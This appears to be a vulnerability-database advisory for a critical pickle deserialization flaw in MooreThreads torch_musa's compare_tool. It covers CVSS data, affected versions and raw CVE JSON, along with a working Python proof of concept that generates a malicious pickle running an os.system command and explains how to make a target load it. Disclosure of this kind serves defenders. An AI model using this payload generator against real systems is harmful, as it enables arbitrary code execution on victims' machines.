Security Vulnerability Report
中文
CVE-2025-65213 CVSS 9.8 CRITICAL

CVE-2025-65213

Published: 2025-12-15 19:16:05
Last Modified: 2026-01-07 20:51:19
Source: [email protected]

Description

MooreThreads torch_musa through all versions contains an unsafe deserialization vulnerability in torch_musa.utils.compare_tool. The compare_for_single_op() and nan_inf_track_for_single_op() functions use pickle.load() on user-controlled file paths without validation, allowing arbitrary code execution. An attacker can craft a malicious pickle file that executes arbitrary Python code when loaded, enabling remote code execution with the privileges of the victim process.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mthreads:torch_musa:*:*:*:*:*:*:*:* - VULNERABLE
MooreThreads torch_musa < 所有版本均受影响
torch_musa 1.0.0 (所有版本)
torch_musa 1.1.0 (所有版本)
torch_musa 1.2.0 (所有版本)
torch_musa 1.3.0 (所有版本)
torch_musa 1.4.0 (所有版本)
torch_musa 1.5.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
""" CVE-2025-65213 PoC - Malicious pickle file generator This PoC demonstrates the unsafe deserialization vulnerability in torch_musa.utils.compare_tool module. Usage: Generate the malicious pickle file, then trigger the vulnerability by having the target application load this file through compare_for_single_op() or nan_inf_track_for_single_op(). """ import pickle import os class MaliciousPayload: """ Malicious class that executes arbitrary code during unpickling. The __reduce__ method is called by pickle.load() to reconstruct the object. """ def __reduce__(self): # This command will be executed on the target system # Replace with any malicious command cmd = "whoami > /tmp/pwned.txt" return (os.system, (cmd,)) def generate_malicious_pickle(output_path="malicious_compare.pkl"): """ Generate a malicious pickle file that exploits CVE-2025-65213. Args: output_path: Path where the malicious pickle file will be saved """ payload = MaliciousPayload() with open(output_path, 'wb') as f: pickle.dump(payload, f) print(f"[+] Malicious pickle file generated: {output_path}") print(f"[+] When loaded by vulnerable function, will execute: whoami > /tmp/pwned.txt") return output_path def simulate_vulnerable_code(pickle_file_path): """ Simulate the vulnerable code pattern found in torch_musa.utils.compare_tool This demonstrates how the vulnerability can be triggered. """ print(f"[*] Simulating vulnerable code execution...") print(f"[*] Loading file: {pickle_file_path}") # This is the vulnerable pattern from the affected code with open(pickle_file_path, 'rb') as f: # VULNERABLE: No validation of pickle file contents data = pickle.load(f) # Executes arbitrary code here print(f"[+] File loaded successfully (code execution occurred)") return data if __name__ == "__main__": import sys if len(sys.argv) > 1 and sys.argv[1] == "--generate": # Generate the malicious pickle file output_file = sys.argv[2] if len(sys.argv) > 2 else "malicious_compare.pkl" generate_malicious_pickle(output_file) else: # Demo mode: generate and trigger (for testing purposes only) malicious_file = generate_malicious_pickle() print("\n[*] To exploit this vulnerability:") print(f"[*] 1. Get the target to call compare_for_single_op('{malicious_file}')") print(f"[*] 2. Or get the target to call nan_inf_track_for_single_op('{malicious_file}')")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65213", "sourceIdentifier": "[email protected]", "published": "2025-12-15T19:16:05.207", "lastModified": "2026-01-07T20:51:19.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MooreThreads torch_musa through all versions contains an unsafe deserialization vulnerability in torch_musa.utils.compare_tool. The compare_for_single_op() and nan_inf_track_for_single_op() functions use pickle.load() on user-controlled file paths without validation, allowing arbitrary code execution. An attacker can craft a malicious pickle file that executes arbitrary Python code when loaded, enabling remote code execution with the privileges of the victim process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mthreads:torch_musa:*:*:*:*:*:*:*:*", "matchCriteriaId": "C9483B7D-B6A7-4C6B-A10C-F650C89482CB"}]}]}], "references": [{"url": "https://github.com/MooreThreads/torch_musa/issues/110#issuecomment-3475809588", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.